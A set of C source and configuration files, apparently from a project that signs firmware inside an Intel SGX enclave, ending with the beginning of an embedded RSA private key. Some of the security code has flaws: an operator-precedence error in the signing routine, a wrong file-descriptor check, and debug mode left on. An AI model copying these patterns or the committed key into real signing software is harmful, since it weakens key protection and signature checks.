*/
static EVP_PKEY *sgx_public_to_EVP_PKEY(const sgx_ec256_public_t *p_public)
{
EVP_PKEY *evp_key = NULL;
EVP_PKEY_CTX *pkey_ctx = NULL;
BIGNUM *bn_pub_x = NULL;
BIGNUM *bn_pub_y = NULL;
EC_POINT *point = NULL;
EC_GROUP* group = NULL;
OSSL_PARAM_BLD *params_build = NULL;
OSSL_PARAM *params = NULL;
const char *curvename = NULL;
int nid = 0;
size_t key_len;
unsigned char pub_key[SGX_ECP256_KEY_SIZE+4];
group = EC_GROUP_new_by_curve_name(NID_X9_62_prime256v1);
if (group == NULL)
return NULL;
do {
// converts the x value of public key, represented as positive integer in little-endian into a BIGNUM
bn_pub_x = BN_lebin2bn((unsigned char*)p_public->gx, sizeof(p_public->gx), bn_pub_x);
if (NULL == bn_pub_x) {
break;
}
// converts the y value of public key, represented as positive integer in little-endian into a BIGNUM
bn_pub_y = BN_lebin2bn((unsigned char*)p_public->gy, sizeof(p_public->gy), bn_pub_y);
if (NULL == bn_pub_y) {
break;
}
// creates new point and assigned the group object that the point relates to
point = EC_POINT_new(group);
if (NULL == point) {
break;
}
// sets point based on public key's x,y coordinates
if (1 != EC_POINT_set_affine_coordinates(group, point, bn_pub_x, bn_pub_y, NULL)) {
break;
}
// check point if the point is on curve
if (1 != EC_POINT_is_on_curve(group, point, NULL)) {
break;
}
// convert point to octet string
key_len = EC_POINT_point2oct(group, point, POINT_CONVERSION_COMPRESSED, pub_key, sizeof(pub_key), NULL);
if (key_len == 0) {
break;
}
// build OSSL_PARAM
params_build = OSSL_PARAM_BLD_new();
if (NULL == params_build) {
break;
}
nid = EC_GROUP_get_curve_name(group);
if (nid == NID_undef) {
break;
}
curvename = OBJ_nid2sn(nid);
if (curvename == NULL) {
break;
}
if (1 != OSSL_PARAM_BLD_push_utf8_string(params_build, "group", curvename, 0)) {
break;
}
if (1 != OSSL_PARAM_BLD_push_octet_string(params_build, OSSL_PKEY_PARAM_PUB_KEY, pub_key, key_len)) {
break;
}
params = OSSL_PARAM_BLD_to_param(params_build);
if (NULL == params) {
break;
}
// get pkey from params
pkey_ctx = EVP_PKEY_CTX_new_from_name(NULL, "EC", NULL);
if (NULL == pkey_ctx) {
break;
}
if (1 != EVP_PKEY_fromdata_init(pkey_ctx)) {
break;
}
if (1 != EVP_PKEY_fromdata(pkey_ctx, &evp_key, EVP_PKEY_PUBLIC_KEY, params)) {
EVP_PKEY_free(evp_key);
evp_key = NULL;
}
} while(0);
BN_clear_free(bn_pub_x);
BN_clear_free(bn_pub_y);
EC_POINT_clear_free(point);
OSSL_PARAM_free(params);
OSSL_PARAM_BLD_free(params_build);
EVP_PKEY_CTX_free(pkey_ctx);
EC_GROUP_free(group);
return evp_key;
}
int handle_proxysetup(int argc, char** argv) {
struct ProxysetupArgs args = {
NULL,
NULL
};
FILE* sealed_file;
int sealed_size;
uint8_t* sealed;
sgx_ec256_public_t sgx_public_key;
EVP_PKEY* public_key;
sgx_status_t sgx_ret;
/*
* Parse Input
*/
int i = 0;
while(i < argc) {
if(strcmp(argv[i], "-pkey")==0 && argc-i >=2){
args.sealed_key_file_path = argv[i+1];
i += 2;
}else if(strcmp(argv[i], "-token")==0 && argc-i >=2){
args.sgx_token_path = argv[i+1];
i += 2;
}else
syntax_exit();
}
if(args.sealed_key_file_path == NULL)
syntax_exit();
/*
* Initialize SGX Enclave
*/
if (initialize_enclave(args.sgx_token_path) != 0)
exit (EXIT_FAILURE);
/*
* Setup Sealed Keypair
*/
sealed_file = fopen(args.sealed_key_file_path, "wb");
if(sealed_file == NULL){
perror("Error opening sealed_key_file file");
exit (EXIT_FAILURE);
}
sgx_ret = get_sealed_size(get_global_eid(), &sealed_size);
if (sgx_ret != SGX_SUCCESS) {
sgx_print_error_message(sgx_ret);
exit (EXIT_FAILURE);
}
sealed = malloc(sizeof(uint8_t)*sealed_size);
if (sealed == NULL) {
fprintf(stderr, "failed to allocate for sealed key");
exit (EXIT_FAILURE);
}
/*
* Use Enclave To Generate Keypair
*/
generate_key_pair(get_global_eid(), &sgx_ret, sealed, sealed_size);
if (sgx_ret != SGX_SUCCESS) {
sgx_print_error_message(sgx_ret);
exit (EXIT_FAILURE);
}
/*
* Store Sealed Keypair
*/
if (fwrite(sealed, sealed_size, 1, sealed_file) != 1 || ferror(sealed_file) != 0) {
fprintf(stderr, "failed to write sealed key");
exit (EXIT_FAILURE);
}
fflush(sealed_file);
fclose(sealed_file);
/*
* Fetch Public Key From Enclave And Print
*/
get_public_key(get_global_eid(), &sgx_ret, sealed, sealed_size, (uint8_t*)&sgx_public_key);
if (sgx_ret != SGX_SUCCESS) {
sgx_print_error_message(sgx_ret);
exit (EXIT_FAILURE);
}
public_key = sgx_public_to_EVP_PKEY(&sgx_public_key);
if (PEM_write_PUBKEY(stdout, public_key) != 1) {
fprintf(stderr, "could not write publickey\n");
exit (EXIT_FAILURE);
}
fflush(stdout);
EVP_PKEY_free(public_key);
free(sealed);
exit (EXIT_SUCCESS);
}

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#ifndef _APP_PROXYSETUP_H_
#define _APP_PROXYSETUP_H_
/*
* @brief getter for proxysetup subcommand syntax string
*
* @returns null-terminated syntax string
*/
char* proxysetup_syntax(void);
/*
* @brief CLI implementation for the "proxysetup" subcommand
*
* @param argc number of arguments with command and subcommand stripped
* @param argv arguments with command and subcommand stripped
*
* @returns 0 on success, else error with output on stderr
*/
int handle_proxysetup(int argc, char** argv);
#endif

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#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include "embedded_device.h"
#include "employee.h"
#include "util.h"
#include "proxy.h"
#include "proxysetup.h"
static char* BIN_NAME = "SignatureProxy";
static sgx_enclave_id_t global_eid = 0;
void syntax_exit(void) {
char* syntax =
"SignatureProxy Version 0.0.0\n"
"Syntax: %s <command> <arguments>\n"
"\n"
"Commands:\n"
"%s"
"\n"
"%s"
"\n"
"%s"
"\n"
"%s";
printf(syntax, BIN_NAME, proxysetup_syntax(), employee_syntax(), proxy_syntax(), embedded_device_syntax());
exit (EXIT_FAILURE);
}
void set_bin_name(char* bin_name) {
BIN_NAME = bin_name;
}
/*
* This definition is copied from the provided SGX Examples.
* The specified License applies.
*/
typedef struct _sgx_errlist_t {
sgx_status_t err;
const char *msg;
const char *sug; /* Suggestion */
} sgx_errlist_t;
/*
* This definition is copied from the provided SGX Examples.
* The specified License applies.
*/
/* Error code returned by sgx_create_enclave */
static sgx_errlist_t sgx_errlist[] = {
{
SGX_ERROR_UNEXPECTED,
"Unexpected error occurred.",
NULL
},
{
SGX_ERROR_INVALID_PARAMETER,
"Invalid parameter.",
NULL
},
{
SGX_ERROR_OUT_OF_MEMORY,
"Out of memory.",
NULL
},
{
SGX_ERROR_ENCLAVE_LOST,
"Power transition occurred.",
"Please refer to the sample \"PowerTransition\" for details."
},
{
SGX_ERROR_INVALID_ENCLAVE,
"Invalid enclave image.",
NULL
},
{
SGX_ERROR_INVALID_ENCLAVE_ID,
"Invalid enclave identification.",
NULL
},
{
SGX_ERROR_INVALID_SIGNATURE,
"Invalid enclave signature.",
NULL
},
{
SGX_ERROR_OUT_OF_EPC,
"Out of EPC memory.",
NULL
},
{
SGX_ERROR_NO_DEVICE,
"Invalid SGX device.",
"Please make sure SGX module is enabled in the BIOS, and install SGX driver afterwards."
},
{
SGX_ERROR_MEMORY_MAP_CONFLICT,
"Memory map conflicted.",
NULL
},
{
SGX_ERROR_INVALID_METADATA,
"Invalid enclave metadata.",
NULL
},
{
SGX_ERROR_DEVICE_BUSY,
"SGX device was busy.",
NULL
},
{
SGX_ERROR_INVALID_VERSION,
"Enclave version was invalid.",
NULL
},
{
SGX_ERROR_INVALID_ATTRIBUTE,
"Enclave was not authorized.",
NULL
},
{
SGX_ERROR_ENCLAVE_FILE_ACCESS,
"Can't open enclave file.",
NULL
},
};
/*
* This Method is copied from the provided SGX Examples.
* The specified License applies.
*/
/* Check error conditions for loading enclave */
void sgx_print_error_message(sgx_status_t ret)
{
size_t idx = 0;
size_t ttl = sizeof sgx_errlist/sizeof sgx_errlist[0];
for (idx = 0; idx < ttl; idx++) {
if(ret == sgx_errlist[idx].err) {
if(NULL != sgx_errlist[idx].sug)
printf("Info: %s\n", sgx_errlist[idx].sug);
printf("Error: %s\n", sgx_errlist[idx].msg);
break;
}
}
if (idx == ttl)
printf("Error code is 0x%X. Please refer to the \"Intel SGX SDK Developer Reference\" for more details.\n", ret);
}
/*
* This Method is copied from the provided SGX Examples.
* The specified License applies.
*/
int initialize_enclave(char* token_path) {
FILE* sgx_token_file = NULL;
sgx_launch_token_t token = {0};
sgx_status_t ret;
int updated = 0;
if (token_path != NULL) {
sgx_token_file = fopen(token_path, "rb");
}
if(sgx_token_file == NULL){
if (errno != ENOENT && token_path != NULL) {
perror("Error opening sgx token file");
exit(1);
}
}else{
size_t read_num = fread(token, 1, sizeof(sgx_launch_token_t), sgx_token_file);
if (read_num != 0 && read_num != sizeof(sgx_launch_token_t)) {
fprintf(stderr, "sgx token file is corrupted");
return (1);
}
}
ret = sgx_create_enclave("enclave.signed.so", SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL);
if (ret != SGX_SUCCESS) {
sgx_print_error_message(ret);
return (1);
}
if (updated && token_path != NULL) {
sgx_token_file = freopen(token_path, "wb", sgx_token_file);
if(sgx_token_file == NULL){
perror("Error opening sgx token file");
return (1);
}
size_t write_num = fwrite(token, 1, sizeof(sgx_launch_token_t), sgx_token_file);
if (write_num != sizeof(sgx_launch_token_t)){
fprintf(stderr,"Warning: Failed to save launch token to \"%s\".\n", token_path);
return (1);
}
}
return (0);
}
sgx_enclave_id_t get_global_eid(void){
return global_eid;
}
int load_file(const char* path, uint8_t** data, size_t* data_len) {
FILE* file;
size_t file_size;
uint8_t* buf;
int file_des = open(path, O_RDWR);
if(file_des == 0)
return (1);
struct stat stat;
if (fstat(file_des, &stat) != 0){
close(file_des);
return (2);
}
close(file_des);
file_size = stat.st_size;
buf = malloc(file_size);
if (buf == NULL)
return (3);
file = fopen(path, "rb");
if(file == NULL){
free(buf);
return (4);
}
if (fread(buf, file_size, 1, file) != 1 || ferror(file) != 0) {
free(buf);
fclose(file);
return (5);
}
fclose(file);
*data = buf;
*data_len = file_size;
return (0);
}

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#ifndef _APP_UTIL_H_
#define _APP_UTIL_H_
#include <sgx_urts.h>
/*
* @brief prints the command syntax and exits with EXIT_FAILURE
*/
void syntax_exit(void);
void set_bin_name(char* bin_name);
void sgx_print_error_message(sgx_status_t ret);
int initialize_enclave(char* token_path);
sgx_enclave_id_t get_global_eid(void);
/*
* @brief loads a file completely into the HEAP
*
* Loads a File into HEAP and returns a dynamically allocated buffer.
*
* @param path path of the file
* @param data allocated buffer output
* @param data_len length of the allocated buffer
* @returns 0 on success, non zero on error
*/
int load_file(const char* path, uint8_t** data, size_t* data_len);
#endif

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@ -0,0 +1,337 @@
/*
* Copyright (C) 2011-2018 Intel Corporation. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Intel Corporation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include <stdarg.h>
#include <stdio.h> /* vsnprintf */
#include <string.h>
#include <stdlib.h>
#include "enclave.h"
#include "enclave_t.h"
#include <sgx_tseal.h>
#include <sgx_error.h>
#include <sgx_tcrypto.h>
#ifndef SK_SIZE
#define SK_SIZE SGX_ECP256_KEY_SIZE
#endif
#ifndef PK_SIZE
#define PK_SIZE 2*SK_SIZE
#endif
#ifndef DG_SIZE
#define DG_SIZE SK_SIZE
#endif
#ifndef SI_SIZE
#define SI_SIZE 2*SK_SIZE
#endif
/*
* Bobs and Alices public keys
*/
const sgx_ec256_public_t authorized[2] = {
{
.gx = {
0x9c, 0x72, 0x2b, 0x52, 0x0e, 0xff, 0x07, 0xdc,
0x7a, 0x32, 0x19, 0xbb, 0xd8, 0x41, 0x94, 0x2c,
0xee, 0x17, 0xb2, 0xf6, 0x2e, 0x08, 0x61, 0xab,
0xbc, 0x50, 0xaf, 0xb6, 0x2e, 0xf9, 0x2c, 0xee
},
.gy = {
0x8c, 0x84, 0x2f, 0xb5, 0x94, 0xca, 0x60, 0x94,
0xb0, 0xdc, 0x8a, 0xcf, 0x17, 0x91, 0xd3, 0xab,
0x29, 0x0e, 0x81, 0x8c, 0xf6, 0x95, 0xc6, 0x92,
0x87, 0x0e, 0x1d, 0x76, 0x56, 0xba, 0x51, 0xbb
}
},
{
.gx = {
0x8d, 0x96, 0xa3, 0x4f, 0x1a, 0x18, 0x10, 0x00,
0x72, 0xb5, 0x42, 0x4f, 0x1c, 0xfb, 0xb6, 0xd0,
0x29, 0x4f, 0x5f, 0xd2, 0xef, 0x29, 0x49, 0x1c,
0xea, 0x2b, 0xf5, 0x61, 0x5e, 0x50, 0xe5, 0x76
},
.gy = {
0xb2, 0x58, 0xa6, 0xf9, 0xf3, 0xc4, 0xb5, 0xdf,
0xa0, 0x4b, 0xb6, 0xad, 0xdd, 0xb1, 0x04, 0xec,
0x93, 0x2e, 0x2f, 0xce, 0x34, 0x71, 0x7d, 0xf4,
0x9d, 0xa4, 0xa5, 0xf1, 0x47, 0x0a, 0xba, 0xa1
}
}
};
int get_digest_size() {
return DG_SIZE;
}
int get_sealed_size() {
return sgx_calc_sealed_data_size(PK_SIZE, SK_SIZE);
}
int get_signature_size() {
return SI_SIZE;
}
int get_public_key_size() {
return PK_SIZE;
}
int get_private_key_size() {
return SK_SIZE;
}
/*
* seals a key pair
*/
static sgx_status_t seal_key_pair(const sgx_ec256_private_t *private, const sgx_ec256_public_t *public, uint8_t **sealed) {
// allocate temporary buffers on stack
uint8_t pk[PK_SIZE] = {0};
uint8_t sk[SK_SIZE] = {0};
// copy key pair into buffers
memcpy(pk, public->gx, PK_SIZE);
memcpy(sk, private->r, SK_SIZE);
// seal keypair
return sgx_seal_data(PK_SIZE, (const uint8_t *)pk, SK_SIZE, (const uint8_t *)sk, get_sealed_size(), (sgx_sealed_data_t *) *sealed);
}
/*
* unseals a key pair
*/
static sgx_status_t unseal_key_pair(const uint8_t *sealed, sgx_ec256_private_t *private, sgx_ec256_public_t *public) {
// invalid parameter handling
if(sealed == NULL) {
return SGX_ERROR_INVALID_PARAMETER;
}
// allocate temporary buffers on stack
uint8_t pk[PK_SIZE] = {0};
uint8_t sk[SK_SIZE] = {0};
// calculate public_key size and return error for unexpected results
uint32_t pk_size = sgx_get_add_mac_txt_len((const sgx_sealed_data_t *)sealed);
uint32_t sk_size = sgx_get_encrypt_txt_len((const sgx_sealed_data_t *)sealed);
if ((pk_size != PK_SIZE) || (sk_size != SK_SIZE)) {
return SGX_ERROR_UNEXPECTED;
}
// unseal ecc key pair
sgx_status_t status = sgx_unseal_data((const sgx_sealed_data_t *)sealed, pk, &pk_size, sk, &sk_size);
if (status != SGX_SUCCESS) {
return status;
}
// copy buffers into key structs
if(public != NULL) {
memcpy(public->gx, pk, PK_SIZE);
}
if (private != NULL) {
memcpy(private->r, sk, SK_SIZE);
}
// return success
return status;
}
sgx_status_t generate_key_pair(uint8_t *sealed, uint32_t sealed_size) {
// invalid parameter handling
if((sealed == NULL) || (sealed_size != get_sealed_size())) {
return SGX_ERROR_INVALID_PARAMETER;
}
// declare needed structs
sgx_ecc_state_handle_t ecc_handle;
sgx_ec256_private_t private;
sgx_ec256_public_t public;
sgx_status_t status;
// open ecc handle
if((status = sgx_ecc256_open_context(&ecc_handle)) != SGX_SUCCESS) {
return status;
}
// create ecc key pair
if((status = sgx_ecc256_create_key_pair(&private, &public, ecc_handle)) != SGX_SUCCESS) {
goto exit;
}
// seal key pair
status = seal_key_pair(&private, &public, &sealed);
exit: ;
sgx_ecc256_close_context(ecc_handle);
return status;
}
sgx_status_t get_public_key(const uint8_t *sealed, uint32_t sealed_size, uint8_t *public) {
// invalid parameter handling
if((sealed == NULL) || (sealed_size != get_sealed_size())) {
return SGX_ERROR_INVALID_PARAMETER;
} else if(public == NULL) {
return SGX_ERROR_INVALID_PARAMETER;
}
// unseal public key
return unseal_key_pair(sealed, NULL, (sgx_ec256_public_t *)public);
}
/*
* verifies an ecdsa signature
*/
static sgx_status_t verify_signature(const uint8_t *firmware, uint32_t firmware_size, const sgx_ec256_public_t *public, const sgx_ec256_signature_t* ecc_signature) {
// invalid parameter handling
if((firmware == NULL) || (firmware_size == 0) || (public == NULL) || (ecc_signature == NULL)) {
return SGX_ERROR_INVALID_PARAMETER;
}
// declare needed structure
sgx_ecc_state_handle_t ecc_handle;
// open ecc handle
sgx_status_t status;
if((status = sgx_ecc256_open_context(&ecc_handle)) != SGX_SUCCESS) {
return status;
}
// verify signature
uint8_t result;
sgx_status_t verification_status = sgx_ecdsa_verify(firmware, firmware_size, public, ecc_signature, &result, ecc_handle);
// handle failed verification process
if(verification_status != SGX_SUCCESS) {
result = verification_status;
}
// close context and return valid signature
sgx_ecc256_close_context(ecc_handle);
return result;
}
sgx_status_t sign_firmware(const uint8_t *firmware, uint32_t firmware_size, const uint8_t *sealed, uint32_t sealed_size, uint8_t *public_key, uint8_t *signature) {
// invalid parameter handling
if((firmware == NULL) || (firmware_size == 0)) {
return SGX_ERROR_INVALID_PARAMETER;
} else if((public_key == NULL) || (signature == NULL)) {
return SGX_ERROR_INVALID_PARAMETER;
} else if((sealed == NULL) || (sealed_size != get_sealed_size())) {
return SGX_ERROR_INVALID_PARAMETER;
}
// verify public key
for(size_t i = 0; i < sizeof(authorized)/sizeof(authorized[0]); i++) {
if(memcmp(public_key, authorized[i].gx, PK_SIZE) == 0) {
goto sign;
}
}
return SGX_ERROR_UNEXPECTED;
sign: ;
// declare need structures
sgx_ec256_signature_t ecc_signature;
sgx_ecc_state_handle_t ecc_handle;
sgx_ec256_private_t private;
// open ecc handle
sgx_status_t status;
if((status = sgx_ecc256_open_context(&ecc_handle)) != SGX_SUCCESS) {
return status;
}
// verify request
if((status = verify_signature(firmware, firmware_size, (const sgx_ec256_public_t *)public_key, (const sgx_ec256_signature_t *)signature)) != SGX_EC_VALID) {
goto exit;
}
// try unseal keypair
if(status = unseal_key_pair(sealed, &private, (sgx_ec256_public_t *)public_key) != SGX_SUCCESS) {
goto exit;
}
// create signature
if((status = sgx_ecdsa_sign(firmware, firmware_size, &private, &ecc_signature, ecc_handle)) != SGX_SUCCESS) {
goto exit;
}
// copy signature to return buffer
memcpy(signature, ecc_signature.x, SI_SIZE);
// close ecc handle and return success
exit: ;
sgx_ecc256_close_context(ecc_handle);
return status;
}
sgx_status_t verify_firmware(const uint8_t *firmware, uint32_t firmware_size, const uint8_t *sealed, uint32_t sealed_size, const uint8_t *public_key, const uint8_t *signature) {
// invalid parameter handling
if((firmware == NULL) || (firmware_size == 0) || (signature == NULL)) {
return SGX_ERROR_INVALID_PARAMETER;
} else if((sealed == NULL) && (public_key == NULL)) {
return SGX_ERROR_INVALID_PARAMETER;
} else if((sealed != NULL) && (public_key != NULL)) {
return SGX_ERROR_INVALID_PARAMETER;
} else if((sealed_size != get_sealed_size()) && (public_key == NULL)) {
return SGX_ERROR_INVALID_PARAMETER;;
}
// declare needed structures
sgx_ec256_public_t public;
sgx_status_t status;
// verify signature from staff or enclave
if(public_key != NULL) {
// verification only with authorized public keys
for(size_t i = 0; i < sizeof(authorized)/sizeof(authorized[0]); i++) {
if(memcmp(public_key, authorized[i].gx, PK_SIZE) == 0) {
goto verify;
}
}
return SGX_ERROR_UNEXPECTED;
verify: ;
// copy public key into struct
memcpy(public.gx, public_key, PK_SIZE);
} else {
// unseal public key
if((status = unseal_key_pair(sealed, NULL, &public)) != SGX_SUCCESS) {
return status;
}
}
// verify signature and return result
return verify_signature(firmware, firmware_size, &public, (const sgx_ec256_signature_t *)signature);
}

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<EnclaveConfiguration>
<ProdID>0</ProdID>
<ISVSVN>0</ISVSVN>
<StackMaxSize>0x400000</StackMaxSize>
<HeapMaxSize>0x1000000</HeapMaxSize>
<TCSNum>10</TCSNum>
<TCSPolicy>1</TCSPolicy>
<!-- Recommend changing 'DisableDebug' to 1 to make the enclave undebuggable for enclave release -->
<DisableDebug>0</DisableDebug>
<MiscSelect>0</MiscSelect>
<MiscMask>0xFFFFFFFF</MiscMask>
</EnclaveConfiguration>

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@ -0,0 +1,62 @@
/*
* Copyright (C) 2011-2018 Intel Corporation. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Intel Corporation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
/* Enclave.edl - Top EDL file. */
enclave {
/* Import ECALL/OCALL from sub-directory EDLs.
* [from]: specifies the location of EDL file.
* [import]: specifies the functions to import,
* [*]: implies to import all functions.
*/
trusted {
public int get_sealed_size();
public int get_digest_size();
public int get_signature_size();
public int get_public_key_size();
public int get_private_key_size();
public sgx_status_t generate_key_pair([out, size=sealed_size]uint8_t *sealed, uint32_t sealed_size);
public sgx_status_t get_public_key([in, size=sealed_size]const uint8_t *sealed, uint32_t sealed_size, [out, size=64]uint8_t *public_key);
public sgx_status_t sign_firmware([in, size=firmware_size]const uint8_t *firmware, uint32_t firmware_size, [in, size=sealed_size]const uint8_t *sealed, uint32_t sealed_size, [in, out, size=64]uint8_t *public_key, [in, out, size=64]uint8_t *signature);
public sgx_status_t verify_firmware([in, size=firmware_size]const uint8_t *firmware, uint32_t firmware_size, [in, size=sealed_size]const uint8_t *sealed, uint32_t sealed_size, [in, size=64]const uint8_t *public_key, [in, size=64]const uint8_t *signature);
};
/*
* ocall_print_string - invokes OCALL to display string buffer inside the enclave.
* [in]: copy the string buffer to App outside.
* [string]: specifies 'str' is a NULL terminated buffer.
*/
untrusted {
};
};

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@ -0,0 +1,113 @@
/*
* Copyright (C) 2011-2018 Intel Corporation. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* * Neither the name of Intel Corporation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#ifndef _ENCLAVE_H_
#define _ENCLAVE_H_
#include <stdint.h>
#include <sgx_error.h>
/*
* returns the size of the sealed key pair
*/
int get_sealed_size();
/*
* returns the length of the hash used in the signature
*/
int get_digest_size();
/*
* returns the size of the signature created by the enclave
*/
int get_signature_size();
/*
* returns the size of the public key
*/
int get_public_key_size();
/*
* returns the size of the private key
*/
int get_private_key_size();
/*
* @brief generates a secp256r1 key pair and returns it sealed by the TEE
*
* @param sealed buffer to hold the sealed key pair
* @param sealed_size size of the sealed key pair
*
* @returns SGX_SUCCESS on success, else sgx error code
*/
sgx_status_t generate_key_pair(uint8_t *sealed, uint32_t sealed_size);
/*
* @brief returns the public key of the sealed key pair provided to the enclave
*
* @param sealed buffer containing the sealed key pair
* @param sealed_size size of the sealed key pair
* @param public_key buffer to hold the public key
*
* @returns SGX_SUCCESS on success, SGX_ERROR_INVALID_PARAMETER for invalid parameters, else sgx error code
*/
sgx_status_t get_public_key(const uint8_t *sealed, const uint32_t sealed_size, uint8_t *public_key);
/*
* @brief signs the firmware provided by an authorized employee
*
* @param firmware buffer containing the firmware
* @param firmware_size size of the sealed key pair
* @param sealed buffer containing the sealed key pair
* @param sealed_size size of the sealed key pair
* @param public_key buffer with the employees public key; holds enclaves public key after successful signing
* @param signature buffer with the employees signature; holds the enclaves signature after successful signing
*
* @returns SGX_SUCCESS on success, SGX_ERROR_INVALID_PARAMETER for invalid parameters, else sgx error code
*/
sgx_status_t sign_firmware(const uint8_t *firmware, uint32_t firmware_size, const uint8_t *sealed, uint32_t sealed_size, uint8_t *public_key, uint8_t *signature);
/*
* @brief verifies a firmware signature provided by an authorized employee or enclave
*
* @param firmware buffer containing the firmware
* @param firmware_size size of the sealed key pair or NULL
* @param sealed buffer containing the sealed key pair
* @param sealed_size size of the sealed key pair
* @param public_key buffer with the employees public key or NULL
* @param signature buffer with the employees signature
*
* @returns SGX_EC_VALID on success, SGX_EC_INVALID for invalid signatures, SGX_ERROR_INVALID_PARAMETER for invalid parameters, else sgx error code
*/
sgx_status_t verify_firmware(const uint8_t *firmware, uint32_t firmware_size, const uint8_t *sealed, uint32_t sealed_size, const uint8_t *public_key, const uint8_t *signature);
#endif /* !_ENCLAVE_H_ */

View file

@ -0,0 +1,10 @@
enclave.so
{
global:
g_global_data_sim;
g_global_data;
enclave_entry;
g_peak_heap_used;
local:
*;
};

View file

@ -0,0 +1,39 @@
-----BEGIN RSA PRIVATE KEY-----
MIIG4gIBAAKCAYEAroOogvsj/fZDZY8XFdkl6dJmky0lRvnWMmpeH41Bla6U1qLZ
AmZuyIF+mQC/cgojIsrBMzBxb1kKqzATF4+XwPwgKz7fmiddmHyYz2WDJfAjIveJ
ZjdMjM4+EytGlkkJ52T8V8ds0/L2qKexJ+NBLxkeQLfV8n1mIk7zX7jguwbCG1Pr
nEMdJ3Sew20vnje+RsngAzdPChoJpVsWi/K7cettX/tbnre1DL02GXc5qJoQYk7b
3zkmhz31TgFrd9VVtmUGyFXAysuSAb3EN+5VnHGr0xKkeg8utErea2FNtNIgua8H
ONfm9Eiyaav1SVKzPHlyqLtcdxH3I8Wg7yqMsaprZ1n5A1v/levxnL8+It02KseD
5HqV4rf/cImSlCt3lpRg8U5E1pyFQ2IVEC/XTDMiI3c+AR+w2jSRB3Bwn9zJtFlW
KHG3m1xGI4ck+Lci1JvWWLXQagQSPtZTsubxTQNx1gsgZhgv1JHVZMdbVlAbbRMC
1nSuJNl7KPAS/VfzAgEDAoIBgHRXxaynbVP5gkO0ug6Qw/E27wzIw4SmjsxG6Wpe
K7kfDeRskKxESdsA/xCrKkwGwhcx1iIgS5+Qscd1Yg+1D9X9asd/P7waPmWoZd+Z
